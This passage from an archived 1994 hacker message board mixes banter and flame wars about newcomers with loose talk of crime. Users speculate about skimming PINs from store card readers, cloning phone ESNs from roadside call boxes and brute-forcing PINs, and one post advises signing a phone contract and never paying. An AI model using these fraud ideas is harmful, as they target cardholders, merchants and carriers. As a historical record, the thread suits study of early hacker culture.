so the net is my ONLY way. Well, there is stuff out there, but since it is illegal people aren't going to just out an tell you about the sites (and also, I will censor mail on yabbs that contains information on pirate ftp sites, because it can make this system look suspicous as well). If your interested in talking about hacking, etc, this system is about as close as your going to get to being a public h/p/a type system on the net. There is also irc, which is a chat system, which always has a channel called #hack. To get onto it you need to use a client, which you can ftp from (I think). alex From lol@yabbs Thu Mar 31 16:33:53 1994 From: lol@yabbs To: all@yabbs Subject: h/p/a ftp site Date: Thu Mar 31 16:33:53 1994 Thanx a lot for those who helped, arachnoi and htoaster. my main prob is that it's very hard for me to compile anything on this box since the root messes things up with the link libs and such. I wonder if anyone has an already compiled version of the irc client for sunos 4.1.3 or something close. Thanks again. lol From JasonLee@yabbs Fri Apr 1 02:32:30 1994 From: JasonLee@yabbs To: feotus@yabbs Subject: re: you big dummy Date: Fri Apr 1 02:32:30 1994 feotus said: DOES ANYONE KNOW **ANYTHING** ABOUT HACKING/PHREAKING/CELLULAR FRAUD/VIRII/CRYPTOGRAPHY/CODING/CRACKING/PROGRAMMING +++++++++++++++++++++++++++++++++++++++++++++++++++++ Nope. Don't think so. Not here. JasonLee From cosmos@yabbs Fri Apr 1 05:32:35 1994 From: cosmos@yabbs To: JasonLee@yabbs Subject: re: you big dummy Date: Fri Apr 1 05:32:35 1994 You forgot to mention 0-3 day \/\/aR3Z.... Cosmos From Skywise@yabbs Fri Apr 1 06:16:47 1994 From: Skywise@yabbs To: JasonLee@yabbs Subject: re: you big dummy Date: Fri Apr 1 06:16:47 1994 I know a little bit of BASIC. What do you need help with? .s \s .q hey From cosmos@yabbs Fri Apr 1 14:42:11 1994 From: cosmos@yabbs To: Skywise@yabbs Subject: re: you big dummy Date: Fri Apr 1 14:42:11 1994 10 REM *** 3l33T BASIC PROGRAM *** 20 ? "INTEL SUCKS!" 30 GOTO 20 Cosmos From Jeremiah@yabbs Fri Apr 1 17:37:19 1994 From: Jeremiah@yabbs To: all@yabbs Subject: A proggier... Date: Fri Apr 1 17:37:19 1994 This may sound like an odd request, but does anyone know of a UNIX emulator that will run on a dos machine? If one exists, where might I be able to get ahold of it...? From cosmos@yabbs Fri Apr 1 21:34:21 1994 From: cosmos@yabbs To: Jeremiah@yabbs Subject: re: A proggier... Date: Fri Apr 1 21:34:21 1994 1) Get rid of DOS. 2) Get rid of Windoze. 3) FTP netBSD (ask Htoaster for the specific site) 4) Install and go. Or you can run linsux....but I wouldnt be caught dead with it myself. Cosmos From uufnord@yabbs Sat Apr 2 00:07:09 1994 From: uufnord@yabbs To: Lacey@yabbs Subject: re: newbie question Date: Sat Apr 2 00:07:09 1994 I wonder if I was being sarcastic when I asked; but that's so unlike me. From feotus@yabbs Sun Apr 3 15:01:33 1994 From: feotus@yabbs To: all@yabbs Subject: ohmygosh Date: Sun Apr 3 15:01:33 1994 wow, i guess noone knows anything at all. just for a reminder I asked if anyone knew anything about h/p/c/v etc... at all, or if this is just one of the bases where everyone talks about everything BUT h/p/c/v etc... fuckin funny as hell really does anyone besides Cosmos, and Fastjack know what an ESS is? lord help us all. has anyone besides aformentioned couple, ever done anything besides REDBOX Steal passwd files Run Crack or crackerjack etc.. Do fakemail program in a language OTHER than Basic or derivatives thereof i didnt think so. Oh well. NOW for those who have done other things....... me and some people are aquiring cell phones soon. We have the eprom burner etc... I was wondering what one could do with one of the roadside distress phones you see on some hiways. I believe they run cell so maybe steal info from them and run that etc...? also, with the new card checkers in some stores, where the customer runs trheir card thru a small machine slot and then punches in PIN. Now I looked at these before while noone was paying attention it appears that they are all networked to a central machine inthe store. Apperantly this is the one making the call out. What I was wundering is just what could we do with one of these if stolen considering thatthey are easily snatchable. Maybe use it for checks, but then I figured that all the dialing and merchant number info for hte credit service would be on the main server for all of them in the store. Hmmmmm. Must be something of consequence. From JasonLee@yabbs Sun Apr 3 15:35:37 1994 From: JasonLee@yabbs To: feotus@yabbs Subject: re: ohmygosh Date: Sun Apr 3 15:35:37 1994 feotus said: program in a language OTHER than Basic or derivatives thereof +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ How about Logo? ;) No, I can program in C a bit... I doubt you could really do much with the supermarket machine. If you were going to fake calls out to the bank network, then you could really only buy groceries. I guess you could somehow snag PINs off it, but without a card to go along with it, you wouldn't be able to do much. Actually, if you have access to a magnetic strip writer, you might be able to steal the PIN and any other info off the card as the info is being sent out and then encode your own card. Would that work, cuz I'm not quite sure I know what I'm talking about? JasonLee From cosmos@yabbs Sun Apr 3 15:58:09 1994 From: cosmos@yabbs To: feotus@yabbs Subject: re: ohmygosh Date: Sun Apr 3 15:58:09 1994 Feotus, Thank you for your charming little rant. Please return to alt.2600 with the rest of the Delphi and AOL morons. Thank you. Cosmos From Skywise@yabbs Sun Apr 3 19:23:57 1994 From: Skywise@yabbs To: feotus@yabbs Subject: re: ohmygosh Date: Sun Apr 3 19:23:57 1994 You IDIOT!!! How did you even get on this bbs? I thought they had implemented a tighter security system... ESS is an acronym for Electronic Sewage System It is the absolute latest in waste disposal technology and comes your way directly from a research lab hidden in the wilds of upper Canada. I'm sorry I can't tell you more about it... CLASSIFIED you know... From washbord@yabbs Sun Apr 3 20:28:00 1994 From: washbord@yabbs To: all@yabbs Subject: carding... Date: Sun Apr 3 20:28:00 1994 Did you see that CNN report a couple of months ago where carders put a fake faceplate on bank machines which snatched customers reciepts. At the same time they had a camera in a van recording the PIn number the customer s typed in. Later they got the receipts, made fake cards and used the PINs. That's why you may have noticed banks posting signs reminding customers to keep their bank mach. recpts. Of course they got caught, althouhg they did snag close to $100K. If you're not going to be pulling in a couple mil. I would not recommend card scams. From Angstrom@yabbs Sun Apr 3 20:35:24 1994 From: Angstrom@yabbs To: all@yabbs Subject: bbs... Date: Sun Apr 3 20:35:24 1994 Don't suppose anyone knows what UXU stands for? answer expected from Cosmos ;)...I was asked it (along with ESS) when I logged onto a Internet (bbs)/bbs.... From Offe@yabbs Mon Apr 4 09:58:36 1994 From: Offe@yabbs To: Angstrom@yabbs Subject: re: bbs... Date: Mon Apr 4 09:58:36 1994 In message bbs..., Angstrom said: > Don't suppose anyone knows what UXU stands for? answer expected > from Cosmos ;)...I was asked it (along with ESS) when I logged onto a > Internet (bbs)/bbs.... UXU stands for Underground eXperts United. Check for further info. -Offe From Fastjack@yabbs Mon Apr 4 11:45:47 1994 From: Fastjack@yabbs To: feotus@yabbs Subject: re: ohmygosh Date: Mon Apr 4 11:45:47 1994 yIn message ohmygosh, feotus said: > wow, i guess noone knows anything at all. > > just for a reminder I asked if anyone knew anything about h/p/c/v etc... > at all, or if this is just one of the bases where everyone talks about > everything BUT h/p/c/v etc... > > fuckin funny as hell really > > > does anyone besides Cosmos, and Fastjack know what an ESS is? Just give'm your redbox plans and they'll be happy. I refuse to participate in an activity that a bunch of morons are going to get caught (and publicized) doing... > > has anyone besides aformentioned couple, ever done anything besides > REDBOX > Steal passwd files > Run Crack or crackerjack etc.. > Do fakemail > program in a language OTHER than Basic or derivatives thereof > HEHEHE. Half the 'crackers' just run around with borrowed accounts, running scripts they got off usenet, that someone with some knowledge wrote and distributed in an effort to close these kinds of holes that allow nimrods to go root on School X's/Bank X's/Biz X's machine(s). That gives those who consider themselves true hackers a bad name. Half would have a problem with Crack, as user friendly as Alex made it... > > i didnt think so. Oh well. > > > NOW for those who have done other things....... > > me and some people are aquiring cell phones soon. We have the eprom > burner etc... I was wondering what one could do with one of the roadside > distress phones you see on some hiways. I believe they run cell so maybe > steal info from them and run that etc...? > This was done in Californey a while back. They *CLAIM* it can't be done again, but I doubt they did much of anything. All you need is this little box, see, and it gets you ESNs, see, and it's called a.... oh, but I talk too much already. FJ From feotus@yabbs Mon Apr 4 12:53:17 1994 From: feotus@yabbs To: cosmos@yabbs Subject: re: ohmygosh Date: Mon Apr 4 12:53:17 1994 but dear, i have never been to alt.2600 is it lovely this time of year? AOL. aaaaarrrrrggggggghhhhhhhhhhhhhhhhh that's the knife that went thru my heart GASH Im dying Im dying real hackers read alt.cyberpunk harhar From cosmos@yabbs Mon Apr 4 14:01:09 1994 From: cosmos@yabbs To: Fastjack@yabbs Subject: re: ohmygosh Date: Mon Apr 4 14:01:09 1994 FJ, Nice shot. ;) But all the K3wL 3l33t HacK3rZ got caught....I want to be just like Mark Abene when I grow up... Cosmos From hawkwind@yabbs Mon Apr 4 14:50:35 1994 From: hawkwind@yabbs To: all@yabbs Subject: IIRG and TRSI Date: Mon Apr 4 14:50:35 1994 Thanx for the thinks when they ask about warez kiddie groups (TRSI) they're wasting my time...*heck* I'm STILL waiting to be validated... *twidling of thumbs* IIRG = Internation Information Retrieval Guild (some H/P board in St8s) TRSI is that warez group Tri *whatever* So Cosmos, how's it going today? (Don't let that ole high horse of yours die! ;-) ) L8rs, Hawk. From Fastjack@yabbs Mon Apr 4 19:25:42 1994 From: Fastjack@yabbs To: cosmos@yabbs Subject: re: ohmygosh Date: Mon Apr 4 19:25:42 1994 In message re: ohmygosh, cosmos said: > Nice shot. ;) But all the K3wL 3l33t HacK3rZ got caught....I want to be > just like Mark Abene when I grow up... Yeah, I mean, maybe the guy knows more than your average cracker, but he still *got caught*. He's in _Wired_ and _Scientific American_ in one month, fergoshsakes... FJ From promethe@yabbs Thu Apr 7 03:07:47 1994 From: promethe@yabbs To: all@yabbs Subject: #hack on irc! (yuck) Date: Thu Apr 7 03:07:47 1994 Salutations, after LONG hard work to compile irc on a system that has been very badly configured I connect to the #hack room on some irc. What I get is a bunch of insults just because I want to learn. Most of the ppl on there are worthless ppl who think are the best thing since Queen Elizabeth. Don't hackers also think that sometime in their lives they didnt know not even half as much as they know now? com'on guys, remember that person that helped you to begin your hacking life? Wouldnt you like to give bak some of the knowledge you have so someone else might get a kickstart? anyway, i wish i had something more to say but i'm just to sleepy to continue. good nite, prometheus . From dialtone@yabbs Thu Apr 7 05:17:34 1994 From: dialtone@yabbs To: all@yabbs Subject: Operation Sundevil Date: Thu Apr 7 05:17:34 1994 It may be completely old junk... But does anyone have and captured net msg's from the sundevil bust .. or know of a site to come by them..? (I'm just looking for the other names from some of the less metioned states) Greets.....Cosmos From cosmos@yabbs Thu Apr 7 06:43:33 1994 From: cosmos@yabbs To: promethe@yabbs Subject: re: #hack on irc! (yuck) Date: Thu Apr 7 06:43:33 1994 Well, I pity the fool that thinks he is going to get any info from #hack on the IRC.... Why dont you pick up some text and learn something for yourself, did that thought ever cross your mind?? Cosmos From uufnord@yabbs Thu Apr 7 06:50:00 1994 From: uufnord@yabbs To: all@yabbs Subject: that never crossed my mind Date: Thu Apr 7 06:50:00 1994 Wow. I'm totally stinking crazy. That's neat. From promethe@yabbs Thu Apr 7 19:34:00 1994 From: promethe@yabbs To: cosmos@yabbs Subject: re: #hack on irc! (yuck) Date: Thu Apr 7 19:34:00 1994 Salutations, well, that's what ppl here recommended me to do... anyway... what type of texts are you referring to? RFCs? man pages? what? old phrack files? (grin) well, i've read tons of RFCs and man pages and books and whatever... but the best thing for some beginner like me would be to get some nice help from someone that is knowledgeable. I believe that is hacker culture is being destroyed not by feds or any such thing but by old hackers. profound love, prometheus From cosmos@yabbs Thu Apr 7 20:46:23 1994 From: cosmos@yabbs To: promethe@yabbs Subject: re: #hack on irc! (yuck) Date: Thu Apr 7 20:46:23 1994 Sigh.... The best thing you can do IS READ all the stuff you dont need a babysitter holding your hand every step of the way. Hacker culture?? If that isnt an oxymoron I dont know what is. Blah. Learn C, UNIX and get a good job. Dont waste your time trying to become a culture... Cosmos From promethe@yabbs Fri Apr 8 02:45:23 1994 From: promethe@yabbs To: cosmos@yabbs Subject: re: #hack on irc! (yuck) Date: Fri Apr 8 02:45:23 1994 Salutations, I guess you are too inteligent to help someone else... but really who cares? If you don't want to help don't!! Just stop messing with things that you don't know... instead of trying to teach me to hack or not... try to be someone that someone would like to talk with. btw, i WOULDN't be here AT ALL if I didn't hack... so it's not something that I just like doing since I got nothing else to do! I believe it's not me that needs a babysitter but someone else. now I understand why nobody calls you by your complete name... why bother? thoughtfully, void *(*(*prometheus(int argv, char argc)) (HYPER int *HACK!)) PS: if there is someone that would like some beginner please email me... there has to be ppl that arent like cos. (yeah cos) From cosmos@yabbs Fri Apr 8 05:42:31 1994 From: cosmos@yabbs To: promethe@yabbs Subject: re: #hack on irc! (yuck) Date: Fri Apr 8 05:42:31 1994 Heheh..cos I like. In fact, I use it sometimes myself. ;) And as for your whining about me not helping you, go right ahead and keep whining. Nobody I ever have known throughout the years has ever sat on a BBS/#hack and whined and pissed and moaned about noone helping them to "hack" etc... Maybe that's why today we have clueless rejects and the "old time bastards". The old timers refuse to pander to a group of weenies that read alt.2600, hang out on #hack and beg for information when they can go out and get it for themselves, read and learn. But no. They would rather sit on their DOS peecee and call BBS systems that require stupid tests to see if they know the "proper" groups for 3l33t access. They expect a vast section of knowledge to be handed down to them on a golden, "How do I hack this...". When you tell them to read the RFC, the books, the texts, even the friggin man pages they go ballistic. "Hey, thats not cool youre being a jerk." Heh, maybe, but thats the way we learned and believe me, it works. But you dont want to hear this. So flame away, I really do find it amusing. Although I have talked to a few here that actually have a clue.. Cosmos From promethe@yabbs Fri Apr 8 20:43:36 1994 From: promethe@yabbs To: cosmos@yabbs Subject: re: #hack on irc! (yuck) Date: Fri Apr 8 20:43:36 1994 the flamming is over... the only thing is that if you can't help don't try to show you know it all. Telling me to learn C and Unix has nothing to do with what I asked. It's like asking for apples and getting oranges. I asked about net protocols... but i guess you got confused. I know C and i'm learning Unix everyday, and I don't need someone trying to find out if I do or not know some stuff. The message: don't open your mouth if you can't help or make the situation worse. voidly, prometheus From dialtone@yabbs Sat Apr 9 00:41:18 1994 From: dialtone@yabbs To: promethe@yabbs Subject: re: #hack on irc! (yuck) Date: Sat Apr 9 00:41:18 1994 Give me a break and go somewhere else with this complaining...The main part of being a hacker is exploring on your own after you have the general knowledge...(I.E reading anything you can get your hands on) Don't just learn unix,vax, system operations and be creative to exploit the flaws.......If someone held your hand then YOU wouldn't be hacking... Do you really think anyone is going to risk going to jail just so they can say....I teach people to hack you honor doesn't that count for somthing? geeze go cry someplace else.....Take the bull by the horns and hack it...Never mind......I'm not going to sit here and give a ethics lesson to a 10 year old... From tknight@yabbs Sat Apr 9 11:47:37 1994 From: tknight@yabbs To: Dprogram@yabbs Subject: re: red ... Date: Sat Apr 9 11:47:37 1994 thats bull. My non memory tone dialer fools operators all the time. I have practiced alot though. Tobias Knighgt i meant tobias knight(no backspace) From tknight@yabbs Sat Apr 9 12:01:57 1994 From: tknight@yabbs To: feotus@yabbs Subject: re: ohmygosh Date: Sat Apr 9 12:01:57 1994 yes, the call boxes due have esn's and the whole bit. This scam was un by some guys in L.A. for a while and it took the cops forever tocatch them(5 years). Another question, I have the cash,I want a cell phone, I dont want a service agrement(i have my own calling plan :) ) I dont want to spend 400 bux to get one without it. The fences around here are stupid as fuck and dont even stock them,any advice? Tobias Knight From tknight@yabbs Sat Apr 9 12:03:44 1994 From: tknight@yabbs To: Angstrom@yabbs Subject: re: bbs... Date: Sat Apr 9 12:03:44 1994 Underground eXperts United. cool mag,kinda a like a foreign cDc. Tobias Knight From tknight@yabbs Sat Apr 9 12:10:17 1994 From: tknight@yabbs To: all@yabbs Subject: re: bbs... Date: Sat Apr 9 12:10:17 1994 oh joy of joys, I have a question. IF you dont know what i'm talking about go back to sleep.(Cosmos you can wake up now,its a real question) Does anyone know anything about the MARK system? i've gotten into one but i dont know much about it. I've dug through all my lodtj's and phracks,nia's etc..but no luck. anyone have any information about this type of system? Tobias Knight From cosmos@yabbs Sat Apr 9 14:20:28 1994 From: cosmos@yabbs To: dialtone@yabbs Subject: re: #hack on irc! (yuck) Date: Sat Apr 9 14:20:28 1994 Heh, and I didnt even have to say it this time... Cosmos From feotus@yabbs Sat Apr 9 18:27:38 1994 From: feotus@yabbs To: all@yabbs Subject: harhar Date: Sat Apr 9 18:27:38 1994 Hmmm, a little post to tie up some ends cellphones: well what you could do is go to like your mall or something and usually there is at least one little stand or store that is trying to sell cell phones and they will attempt to sell you the acces. All you have to do is buy the phone and then when they go to sell the acces to you, or when they say you have to have it activated thru them, either just tell them NO, or sign the papers and never use it, that way later on you just don't pay it and after awhile you can star playing with that new cellphone. Hee this one bar near here was actually giving them away on St. Pattys day to whoever dressed the most liek alephrachaun. Another thing,depnding on size of town is to go to a wholesaler or something liek that. #hack: ohmygosh. You can pick up sooooo much stuff from there, just like alt.2600, I swear I see at least five scripts a day that let you take over Internet, all youhave to do is eecute them on your account. I swear, Im not lying, would a hacker ever bullshit anyone? sidenote: Look in a bookstore for this book called _Cyberia_ it's like another culture book about cyberspace and it has the fuckin funniest part on hackers in it. The hackers totally pull the guys leg and start telling how they fight with TRW tiger teams for the control of the govt systems and how they have their notes sunk a few miles off the Atlantic shelf and they have people who can get them for them 8) I ws laffing forever after that one. Promethe: well if you want to learn Inet tprotocals there is a good primer for TCP/IP in a old phrack, as well as n various FYIs at Internic and other places, such as Read RFCs FOR REAL, jsut dont say you read them, cause if you really did read them you wouldnt have to ask about protocols, since almost every single protocol ont he net has a RFC for it. From uufnord@yabbs Sun Apr 10 01:57:20 1994 From: uufnord@yabbs To: all@yabbs Subject: Get a Good Job Date: Sun Apr 10 01:57:20 1994 All y'all hackin' dope smokin' varmints a-comin' up from the dell is 'bout five to nine seven and still goin'. All y'all hackin' and sellin' dope is what all y'all live fer. Cain't see no future outisde of 'em, cain't live at all wiffout them thar hackin' and smokin' dope. Think I go and watch me some porno giffies. From johndeer@yabbs Sun Apr 10 14:17:18 1994 From: johndeer@yabbs To: all@yabbs Subject: stuff Date: Sun Apr 10 14:17:18 1994 Magstipe readers at grocery stores: it appears as if most of them ARE connected centrally to a computer onsite. since the registers usually are (to perform matchups between UPC and price) and teh credit card thingies are connected to the register, it wouldn't be that hard. i'm sure the verify is performed like they are for ordinary verifones. perhaps the grocery storetems are smart enough to "batch process" verifies if more than one is sent at a time. the new thing they have, at least in the Wash. DC area, is SCAN, which is teh "shared check authorization network".. this device reads the numbers on the bottom of a check (which is NOT OCR, but instead, MICR) and dials up a database run by the SCAN company that performs a verify.. they interface with most POS register systems as well.. one thing i've always been thinking about is cracking the PIN on atm/credit cards. yes, i know they're encrypted, but almost all pins are 4 digits, which leaves only 10,000 possibilities. if I had a magstripe reader interface to a computer, and a copy of the encryption algorithm (which must be semi-public, for these multitudes of POS devices to perform checks), I could crack it on a computer in minimal time.. cell fones on the freeway: there was a thread in telecom digest a while back, but as I recall the devices are low-power (well, i guess all cell-fones are) and they recharge daily witha solar panel on the top of the box. i wouldn't recommend snagging them, as i'm sure they're stripped down, custom models, which don't have any features at all. probably not even a keypad. john Deere From cosmos@yabbs Sun Apr 10 16:11:50 1994 From: cosmos@yabbs To: johndeer@yabbs Subject: re: stuff Date: Sun Apr 10 16:11:50 1994 Sigh.... Post that to alt.2600 Cosmos From promethe@yabbs Sun Apr 10 19:22:03 1994 From: promethe@yabbs To: all@yabbs Subject: re: stuff Date: Sun Apr 10 19:22:03 1994 Salutations, thanks feotus... i really do read them.. but from now on i guess i'll go deeper into them. dialtone, if you don't understand the problem don't try to solve it. I asked about net protocols and cosmos comes with weirdest idea about reading books about c and unix. Did he ever ask if I knew any of those? cosmos, i remember a quote: "The greatest of a person is not on how much it has but in how much it can give others.[A (not greatest but greatness) as I said previously the flamming is over. with profound love, prometheus *hate flames* From feotus@yabbs Sun Apr 10 22:46:10 1994 From: feotus@yabbs To: promethe@yabbs Subject: greatness Date: Sun Apr 10 22:46:10 1994 since when has anyone in this forum ever expressed aspirations to achieve greatness? if you learn some unix than the protocols would come much quicker, as well as C. It's all linked together. cos - should we just take any informative post to alt.2600? They do seem to have a lack of them. But otherwise I see no reason to bother. your funny. From ButtrBoy@yabbs Mon Apr 11 11:04:45 1994 From: ButtrBoy@yabbs To: all@yabbs Subject: Group. Date: Mon Apr 11 11:04:45 1994 All hack groups are bad luck. Bad karma. Bound to get in trouble, even if nothing happens. They'll just stick you with a conspiracy charge, don't need evidence of your wrongdoing; by dint of your affiliation with a group, you're guilty. ex. Phiber Optik. Mingle a little, but don't push your luck hacking as part of a group. Bad news. From htoaster@yabbs Mon Apr 11 11:11:29 1994 From: htoaster@yabbs To: ButtrBoy@yabbs Subject: re: Group. Date: Mon Apr 11 11:11:29 1994 i'd tend to agree with can always hang out w/ others who hack, but don't give yourself a group name or any of that shit, and don't let anyone know that you hack together...its easy to get caught, and being in a group makes it easier... better yet, if you want to learn, don't learn hacking. get yourself a unix account (hey, their cheap...$20/month isn't bad and is realizable in a ton of places)...learn the system...program neat stuff...i learned a whole lot more writing yabbs than i ever learned breaking into systems... alex From cosmos@yabbs Mon Apr 11 11:46:58 1994 From: cosmos@yabbs To: htoaster@yabbs Subject: re: Group. Date: Mon Apr 11 11:46:58 1994 Yep. Listen to HT. Groups are a bad idea. As for the hacking bit, I really don't care who is running around doing what. Hell, I just can't stand the state of the "modern" cracker. What ever happened to exploring and learning on ones own intuition?? It's like feeding time at the zoo...gimme gimme gimme. Cosmos From promethe@yabbs Mon Apr 11 13:29:52 1994 From: promethe@yabbs To: arachnoi@yabbs Subject: re: #hack on irc! (yuck) Date: Mon Apr 11 13:29:52 1994 I appreciate a lot your post... thanks for info... I was beginning to think everyone was nuts but now I can see a clear picture.. thx thx thx pro From Fastjack@yabbs Mon Apr 11 13:59:59 1994 From: Fastjack@yabbs To: htoaster@yabbs Subject: re: Group. Date: Mon Apr 11 13:59:59 1994 yIn message re: Group., htoaster said: > i'd tend to agree with can always hang out w/ others who hack, > but don't give yourself a group name or any of that shit, and don't let > anyone know that you hack together...its easy to get caught, and being in > a group makes it easier... > > better yet, if you want to learn, don't learn hacking. get yourself a unix ^^^^^^^^^ Don't you mean cracking? Hate to be picky, but I consider myself a hacker; someone who understands the system that they are on thoroughly-- whether they are breaking into the system or securing it is irrelevant. Contrast this with most of the 'gimme-gimme' guys as cosmos says-- they don't want to learn, they just want power and bragging rights. > account (hey, their cheap...$20/month isn't bad and is realizable in a ton > of places)...learn the system...program neat stuff...i learned a whole lot > more writing yabbs than i ever learned breaking into systems... And I learned a whole lot more about security when I broke into systems, and a whole lot more anout breaking into systems when I was securing them....:) :FJ From feotus@yabbs Tue Apr 12 21:42:04 1994 From: feotus@yabbs To: all@yabbs Subject: re: Group. Date: Tue Apr 12 21:42:04 1994 Groups arent that bad as long sa you realize that you dont even tell them about the real shit you do. I mean it's cool to have poele to esily trade with alot, but as far as ever actually going into places etc.. I usually keep it to me myself and I. tho I have three freinds, whch started out as a group, who I would share alot of stuff withh, but I trust them mroe than I would ever trust anyone else, but that's still not enough to let them know my real name etc.. I learned more from setting up Linux on a few systems and installing the networking software and programming ont hem than I did the whole time I was just a newbie cracker stealing passwd files and running Cjack ont hem like a lamer. Then after getting a base you start picking stuff up alot faster. I must admit tho, tha majority of new crack/hackers that I ever run into today are sipmply wannabes who want you to hand it all to them on a fuckin chrome platter. From dialtone@yabbs Wed Apr 13 04:55:36 1994 From: dialtone@yabbs To: all@yabbs Subject: re: Group. Date: Wed Apr 13 04:55:36 1994 I cant understand the mentality.... To be a hacker is to first and foremost to be stealthy.... If you belong to a group then you only become more dont think people take notice...but...not only do they notice but they take note...and when the bust comes down hackers will turn in their fellow group members like its going outa style...I have seen it first hand!.... Promethe....You really dont understand...Why make yourself look lame...Go out and get the information...Everyone else does!...jeeze they even gave you the places to look...(Forget it ... This is not a war board) Has anyone heard if their will be a summercon this year? From gigi@yabbs Wed Apr 13 08:34:03 1994 From: gigi@yabbs To: all@yabbs Subject: my calender speaks Date: Wed Apr 13 08:34:03 1994 "many of life's failures are people who did not realize how close they were to success when they gave up." q From feotus@yabbs Wed Apr 13 14:12:28 1994 From: feotus@yabbs To: all@yabbs Subject: hnnmm Date: Wed Apr 13 14:12:28 1994 Dialtone - most groups will turn each other in, but with the people that I would trust they won't. Why do I know this? Because there was a bust and said persons didnt squeel on the others. they could have easily done so, but they didnt. Sure most groups you see out there get too big for there too be any trust like this, but a small tight group is the best you can get. you get trust and resources. you can do some awesome shit if everyone does their part. From Skywise@yabbs Wed Apr 13 17:56:15 1994 From: Skywise@yabbs To: dialtone@yabbs Subject: re: Group. Date: Wed Apr 13 17:56:15 1994 Summercon. Heh. Funny joke you stealthy hacker you. From Skywise@yabbs Wed Apr 13 17:59:54 1994 From: Skywise@yabbs To: feotus@yabbs Subject: re: hnnmm Date: Wed Apr 13 17:59:54 1994 What about a triad stuctured group? I have heard that no matter how many actual members there are in this type of group the MAXIMUM number of members that could be busted is four. I know that it is made up of groups of three people that work together. Anyone know how it works? From cosmos@yabbs Wed Apr 13 20:36:40 1994 From: cosmos@yabbs To: all@yabbs Subject: Groups... Date: Wed Apr 13 20:36:40 1994 I had to say this. Group "hacking" is shit. Now, I know what is gonna storm in after the masses read this..."but what about LOD/MOD achievments", they were so k00l. People, groups are childish. System exploration is one thing, but hacking groups are so pathetic. Yeah, yeah, yeah...I know. I am just a conceited old school bastard who doesnt hand out free tips to the kiddies. Cosmos From dialtone@yabbs Thu Apr 14 00:24:24 1994 From: dialtone@yabbs To: all@yabbs Subject: Date: Thu Apr 14 00:24:24 1994 OK.....tightly webbed groups......friends in the same city same area....(i.e you can storm a site and actually have someone to lookout for ya....) but you still dont understand......I have never seen any group that was so tightly webbed that they didnt BRAG.......When you get to be a certain age (the age where you can serve time) you'll live under this same mentality....Ya see they dont give a shit weather or not you directly done anything....they just storm your house (with lots of agents (and many cars)) and take all your STUFF.....the game some of us played when we where younger is no longer a game.....But hey there your friends (and you'll see how goood when the buck stops) For myself....I trust NO ONE! Maybe thats sounds over paranoid but...I'll visit you in the pen okay! I didn't really expect a reply to the summmer con thing...(If I was curious where any next meets were I can assure you I wouldn't ask here) Sooo Stealthy... From Quetzal@yabbs Sat Apr 16 16:43:11 1994 From: Quetzal@yabbs To: dialtone@yabbs Subject: re: Date: Sat Apr 16 16:43:11 1994 Cosmo is definitly right! groups are lae and they always have weak linkit's better to hack by yourself and trade secrets, but stay your distance. From cosmos@yabbs Sat Apr 16 20:07:45 1994 From: cosmos@yabbs To: Nitz@yabbs Subject: re: FOR sale Date: Sat Apr 16 20:07:45 1994 Listen up Nitz you pathetic fuck. First off, I can't believe you would seriously post this shti about selling redboxes. Try alt.2600 shit for brains. If this is a joke...take it elsewhere. BTW, I think I might wander on down to Main street this weekend. Perhpas Ill stop by Grogs Pizza or La Bamba's for a quick bite before I come and buy one of your k00l redboxes and then shove it up your ass! Cosmos From dialtone@yabbs Sun Apr 17 03:54:04 1994 From: dialtone@yabbs To: all@yabbs Subject: re: FOR sale Date: Sun Apr 17 03:54:04 1994 I missed it....You can't be serious...(Selling red box's?) It must have been the message that is maked for deletion...Either the joke's on us or he never came out of the 70's.... From rattler@yabbs Sun Apr 17 07:00:33 1994 From: rattler@yabbs To: feotus@yabbs Subject: re: sum Date: Sun Apr 17 07:00:33 1994 this is problably gonna get a few replies, but a 1024 RSA key for people like NSA with the right funding is like hours instead of years. From rattler@yabbs Sun Apr 17 07:02:37 1994 From: rattler@yabbs To: Lacey@yabbs Subject: re: newbie question Date: Sun Apr 17 07:02:37 1994 maybe the guy tried to make a joke ? (it's ONLY an idea, like ?) From feotus@yabbs Sun Apr 17 11:06:57 1994 From: feotus@yabbs To: rattler@yabbs Subject: rsa Date: Sun Apr 17 11:06:57 1994 NOPE, you're wrong it's not hours you should now go shoot whoever told you that lie. a 1024 bit RSA is very very secure, tho i wouldnt use it if your trying to get anything like the life expectancy or plutonium out of it. It'll be secure for a long long time. try years not hours. just think how long it took them to crack *ONE* modulous of it on a bunch of different computers witha whole shitload of power. And then realize that is only *ONE* modulous out aof an almost infinite amount. try factoring some massive primes sometime, you'll see From JasonLee@yabbs Sun Apr 17 11:54:20 1994 From: JasonLee@yabbs To: cosmos@yabbs Subject: re: FOR sale Date: Sun Apr 17 11:54:20 1994 cosmos said: BTW, I think I might wander on down to Main street this weekend. Perhpas Ill stop by Grogs Pizza or La Bamba's for a quick bite before I come and buy one of your k00l redboxes and then shove it up your ass! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ GIF! GIF! GIF! JasonLee From mephisto@yabbs Sun Apr 17 13:31:17 1994 From: mephisto@yabbs To: feotus@yabbs Subject: re: cellphones Date: Sun Apr 17 13:31:17 1994 Dude, ofcourse, you see ads in the papers all the time "Free cell phone for x", or "Win a free cell phone if you do that"... you forget to read the fine print... you've GOT TO PAY the subscription price fo a certain # of months... if you buy a phone w/o subscription, you're looking at a good $600+. Yeah, you can get 'em free, but you're going to end up paying a few hundred $ for the fucking subscription... From Schief@yabbs Sun Apr 17 20:57:44 1994 From: Schief@yabbs To: all@yabbs Subject: rexd hole? Date: Sun Apr 17 20:57:44 1994 I heard someone mention a hole involving rexd. Could someone explain this for my benefit, since I am unfamiliar with this one... From ButtrBoy@yabbs Mon Apr 18 01:53:37 1994 From: ButtrBoy@yabbs To: Schief@yabbs Subject: re: rexd hole? Date: Mon Apr 18 01:53:37 1994 rexd? is this a daemon for a protocol i've never heard about? on the bugtraq list there was recently a flurry over ftpd trojans...something in the passwd checking routine (looks like this in ftpd.c:) #ifdef ULTRIX_AUTH if ((numfails = ultrix_check_pass(passwd, xpasswd)) < 0) { #else /* The strcmp does not catch null passwords! */ if (pw == NULL || *pw->pw_passwd == '\0' || strcmp(xpasswd, pw->pw_passwd)) { #endif reply(530, "Login incorrect."); All ftpd versions 2.2 and before are insecure, wu-ftpd 2.3 is the new patched version. The above snatch of src is from the earlier version... From dmonger@yabbs Mon Apr 18 11:03:35 1994 From: dmonger@yabbs To: feotus@yabbs Subject: re: rsa Date: Mon Apr 18 11:03:35 1994 had a discussion about this with a couple of friends of mine once. the key is dedicated hardware. Crays are cool, but there's too much overhead. Why bother tho .... XILINX are your 